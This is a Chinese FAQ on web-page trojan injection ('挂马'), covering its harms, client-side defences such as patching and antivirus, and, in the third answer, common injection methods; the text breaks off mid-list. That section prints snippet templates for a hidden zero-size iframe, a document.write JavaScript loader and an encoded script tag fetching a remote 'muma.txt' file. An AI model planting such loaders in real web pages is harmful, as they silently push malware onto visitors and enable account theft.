1、网页被挂马后是否有危害?危害有多大?
答:网页被挂马,在一定程度上可以说是网页被篡改,但是比较隐蔽。危害很大。对服务器端来说,一方面是系统资源,流量带宽资源的巨大损失,另一方面也成为了传播网页
木马的“傀儡帮凶”,严重影响到网站的公众信誉度;对客户端来说,很多网页
木马都是利益驱动,偷盗各类帐号密码,如电子银行帐户和密码、游戏帐号和密码、邮箱帐户和密码、QQ/MSN 帐号和密码等;另外,使得客户端被安装恶意插件,强迫浏览黑客指定的网站;或者被利用攻击某个站点等。
目前流行的“游戏信使”(盗用各类网游帐号密码)也都是依靠网页挂马攻击来实现的。在主动越来越困难
的情况下,利用网页
木马进行攻击已经成为目前最为流行的黑客攻击手段,所以应引起足够重视!
2、常见客户端防网页
木马都有哪些好办法?
答:概括起来,大致有4钟常见办法:
(1)安装微软Windows和IE的最新补丁。
由于各类
漏洞会不断地被发现,而一些严重性较高的
漏洞在发现后不久就会有相应的病毒出现。所以即时安装补丁可以降低病毒入侵的可能性。可以通过Windows Update获取最新的补丁包,对于浏览器来说,可禁用部分控件和脚本等安全性设置。
(2)使用
杀毒软件,并升级到最新的病毒库。
较新的病毒库可以识别出部分
木马,并阻断恶意代码在本地运行,可大大降低感染
木马的可能性。
(3)养成良好的上网习惯,不要随便浏览信用度不高的网站。
网络上的各种网站鱼目混杂,有很多陷阱等着浏览者上钩。
(4)尽量在较大网站下载软件或浏览图片。
很多网站由于利益的驱动,有的在软件中捆绑了广告软件,有的甚至在软件中直接加入
木马。更有甚者,黑客在成功入侵了一个软件下载网站后,很可能替换人们最为常用的软件,危害很大,影响面更广。
3、服务器通常都有哪些常见挂马方式?
答:关于挂马方法教程以及网页
木马自动生成器等互联网上较多,这里就几个常见的进行列举:
(1)框架挂马
<iframe src=地址 width=0 height=0></iframe>
(2)js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js, 则JS挂马代码为
<script language=javascript src=xxx.js></script>
(3)js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
(4)body挂马